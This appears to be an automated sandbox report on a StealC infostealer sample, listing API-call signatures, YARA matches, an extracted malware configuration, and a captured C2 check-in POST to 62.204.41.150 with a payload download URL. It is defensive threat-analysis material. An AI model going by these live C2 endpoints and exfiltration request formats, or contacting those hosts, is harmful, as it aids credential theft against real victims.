Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_001088CD

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

15_2_00114F1C

Source: M13W1o3scc.exe, 00000000.00000003.1693698599.0000000002896000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000A.00000000.1728038915.0000000000166000.00000002.00000001.01000000.00000007.sdmp, Welding.pif, 0000000F.00000000.2027440522.0000000000166000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Welding.pif	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000D885B cpuid

15_2_000D885B

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_00436121
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_0043C35A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_00436514
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C5D2
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C61D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C6B8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_0043C745
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_0043C995
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_0043CABE
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_0043CBC5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_0043CC92
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	16_2_00417B90
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	16_2_022B7DF7

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000F0030 GetLocalTime,__swprintf,

15_2_000F0030

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000F0722 GetUserNameW,

15_2_000F0722

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000E416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

15_2_000E416A

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2258545852.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

OS version to string mapping found (often used in BOTs)

Source: Welding.pif	Binary or memory string: WIN_81
Source: Welding.pif	Binary or memory string: WIN_XP
Source: Welding.pif	Binary or memory string: WIN_XPe
Source: Welding.pif	Binary or memory string: WIN_VISTA
Source: Welding.pif	Binary or memory string: WIN_7
Source: Welding.pif	Binary or memory string: WIN_8
Source: Reference.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2258545852.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042287C Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,		15_2_0042287C
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00421BA6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		15_2_00421BA6

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
176.113.115.37	unknown	Russian Federation	49505	SELECTELRU	false
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
62.204.41.150	unknown	United Kingdom	30798	TNNET-ASTNNetOyMainnetworkFI	true

Contacted Domains

Name	IP	Active
post-to-me.com	172.67.179.207	true
OrCgYwgbqLzMaeWAfOkOCMa.OrCgYwgbqLzMaeWAfOkOCMa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.150/edd20096ecef326d.php	true	12%, Virustotal, Browse	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	3%, Virustotal, Browse	unknown
http://62.204.41.150/	true	9%, Virustotal, Browse	unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1310247

Found malware configuration

Source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}

Multi AV Scanner detection for domain / URL

Source: http://62.204.41.151/ScreenUpdateSync.exe	Virustotal: Detection: 19%	Perma Link
Source: http://62.204.41.150/ows	Virustotal: Detection: 6%	Perma Link
Source: http://62.204.41.150	Virustotal: Detection: 9%	Perma Link
Source: http://62.204.41.151/ScreenUpdateSync.exegyaCannot	Virustotal: Detection: 17%	Perma Link
Source: http://62.204.41.150/edd20096ecef326d.php	Virustotal: Detection: 12%	Perma Link
Source: http://62.204.41.150/	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Virustotal: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Virustotal: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: M13W1o3scc.exe

Virustotal: Detection: 11%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	16_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	16_2_00407240
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	16_2_00409AC0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	16_2_00418EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	16_2_00409B60
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ACA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	16_2_022ACA87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	16_2_022A74A7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	16_2_022A9D27
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	16_2_022B9107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	16_2_022A9DC7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack

Uses 32bit PE files

Source: M13W1o3scc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:60060 version: TLS 1.2

Source: M13W1o3scc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00114005
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE26E Process32NextW,SetFileTime,GetFileAttributesW,FindFirstFileW,__floor_pentium4,GetShortPathNameW,DeleteFileW,__floor_pentium4,	15_2_000BE26E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011C2FF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose,	15_2_0011494A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD14 FindFirstFileW,FindClose,	15_2_0011CD14
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_0011CD9F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F5D8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F735
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011FA36
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00113CE2
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	16_2_00414570
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_00414910
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	16_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_022AE697
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_022B3B17
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022B4B77
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_022AEF87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	16_2_022B47D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AE077
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_022ADCE7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_022AC0D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022A1937
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	16_2_022B4107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AF917

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:60062 -> 62.204.41.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.150/edd20096ecef326d.php

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 31 38 31 38 36 35 45 36 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="hwid"E3181865E6061437788654------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build"default6_cap------JDBGHIIDAECBFIDHIIDG--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 62.204.41.150 62.204.41.150

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:60061 -> 176.113.115.37:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:60060 -> 172.67.179.207:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
